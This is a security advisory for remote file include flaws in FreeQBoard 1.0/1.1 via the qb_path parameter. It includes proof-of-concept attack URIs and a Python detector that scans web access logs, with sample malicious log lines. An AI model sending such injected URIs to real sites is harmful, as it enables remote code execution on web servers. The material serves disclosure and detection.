FreeQBoard QB_Path Parameter Multiple Remote File Include Vulnerabilities
BID:21394
CVE-2006-3475
| Bugtraq ID: | 21394 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 01 2006 12:00AM |
| Updated: | Dec 02 2006 01:24AM |
| Credit: | -= SHELL =- is credited with the discovery of these vulnerabilities. |
| Vulnerable: | free QBoard 1.1, free QBoard 1.0 |
| Not Vulnerable: | |
Discussion
FreeQboard is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
FreeQboard 1.1 and prior versions are vulnerable to these issues.
Exploit / POC
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/index.php?qb_path=shellcode.txt?
http://www.example.com/[path]/faq.php?qb_path=shellcode.txt?
http://www.example.com/[path]/delete.php?qb_path=shellcode.txt?
http://www.example.com/[path]/contact.php?qb_path=shellcode.txt?
http://www.example.com/[path]/about.php?qb_path=shellcode.txt?
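For defenders, the request pattern in the URIs above can be hunted for in web server access logs. The following is an added example, not part of the original advisory or the FreeQBoard code: it assumes Common/Combined Log Format and assumes legitimate clients never supply `qb_path` themselves; the function names and sample log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts named in the advisory's proof-of-concept URIs.
LISTED_SCRIPTS = {"index.php", "faq.php", "delete.php", "contact.php", "about.php"}
# Request field of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value that starts with a URL scheme / stream wrapper, "//" or a UNC prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def inspect_line(line):
    """Return a finding dict when the request supplies qb_path, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    script = unquote(parts.path).rsplit("/", 1)[-1].lower()
    # parse_qsl percent-decodes names and values, so qb%5Fpath is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.split("[", 1)[0] != "qb_path":   # also matches qb_path[]
            continue
        return {
            "client": line.split(" ", 1)[0],
            "script": script,
            "listed": script in LISTED_SCRIPTS,
            "value": value,
            # second unquote() catches double-encoded values
            "remote": bool(REMOTE_RE.match(unquote(value))),
            "status": int(m.group("status")),
        }
    return None

def scan(lines):
    """Findings for every log line that carries a qb_path parameter."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.7 - - [01/Dec/2006:10:00:00 +0000] "GET /board/faq.php?qb_path=shellcode.txt? HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Dec/2006:10:00:05 +0000] "GET /board/about.php?qb%5Fpath=http%3A%2F%2Fhost.invalid%2Ffile.txt%3F HTTP/1.1" 200 734',
    '203.0.113.4 - - [01/Dec/2006:10:00:09 +0000] "GET /board/index.php?page=2 HTTP/1.1" 200 2048',
    '203.0.113.4 - - [01/Dec/2006:10:00:12 +0000] "GET /board/other.php?qb_path[]=x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with `remote` set to true and a 200 status deserve review first; the `listed` flag only records whether the script is one of the five named above, and GET query strings are the only input this check sees.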
Solution / Fix